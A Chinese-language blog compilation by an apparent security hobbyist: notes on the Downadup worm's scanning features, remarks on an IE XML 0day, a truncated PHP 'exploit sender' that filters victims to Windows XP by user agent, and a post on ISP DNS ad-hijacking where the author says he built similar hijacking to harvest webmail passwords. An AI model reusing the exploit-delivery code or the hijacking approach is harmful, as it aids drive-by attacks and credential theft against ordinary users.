呆得无聊，就开始研究几年前的一个有趣的想法。准备把想法工具化,融合到我的平台里面去，这个想法也有人用过一部分，但是不是全部。我记得我以前还在哪个文档里面专门提过这个TIPS。
我以为不会再有第二个像我这么无聊的人，把这个做成工具。
中途就问我朋友一个这里面的一个技术问题，他说 有网上一个工具可以实现这个技术问题。

工具拿来，我就傻眼了。原来还真有跟我一样的无聊的人。那工具跟我想的99%都差不多。

再看这个人的其他工具，工具都是基本上都是我写过的和我想写的。而且都是python写的。

这2天在Symantec的blog上发现这么个蠕虫（https://forums.symantec.com/t5/Malicious-Code/Downadup-Attempts-at-Smart-Network-Scanning/ba-p/382114#A233）

主要特点：
    P2P来共享文件
    连接大网站来测试带宽,来分配扫描任务
    潜在威胁公司（杀毒软件厂商）的IP段被列为黑名单
    SMB Banner识别
   
扫描方法也很独特。

就这些而言达到WORM的一个高度,即使隐藏技术一般。
但是除了蜜罐

ie xml爆了，尽管我和这个漏洞没有一丁点关系.但是还是有些感慨,因为以后漏洞越来越少.
这2年，就浏览器的0day,国内的黑客些就糟蹋了不少.NB的如ani,flash.
一般0day生命周期在他们手上也就2个星期.
最搞笑的是xml被非专业人士捕捉到提交给厂商. (http://bbs.360safe.com/redirect.php?tid=597258&goto=lastpost)
一般来说 浏览器的0day难免被捕捉到,因为始终要输出,但是被普通用户发现.这个实在不好说什么了。
用的还是js来判断.
用毛哥的话来说，一点技术含量都没有.
不过这种情况司空见惯了.

没啥素材,就贴一个很简单的exploit sender

<?
function knowos($useragent){
    if(!stristr(strtolower($useragent),"windows"))
    {
    exit(); //if not windows
    }
    if(!stristr(strtolower($useragent),"nt 5.1"))
    {
    exit(); //if not windows xp
    }
    if(!stris

ipush是电信搞的广告系统。
具体表现为 不存在的域名给你指向到61.139.8.100
或者存在的域名给你劫持了.变成http://ipushserverip/domain.jsp?=http://www.google.com
类似这样的。你的地址栏还是google.com,但是其实是访问的http://ipushserverip/domain.jsp?=http://www.google.com ,内容也是www.google.com的。只是给你插播一下广告。
每次我的noscript都给blocked了，要刷新好几次.
我自己也做过这种东西.做成这样可以套YAHOO，GMAIL什么的密码。

后来换成HINET的DNS,但是速度明显的慢了很多。没办法,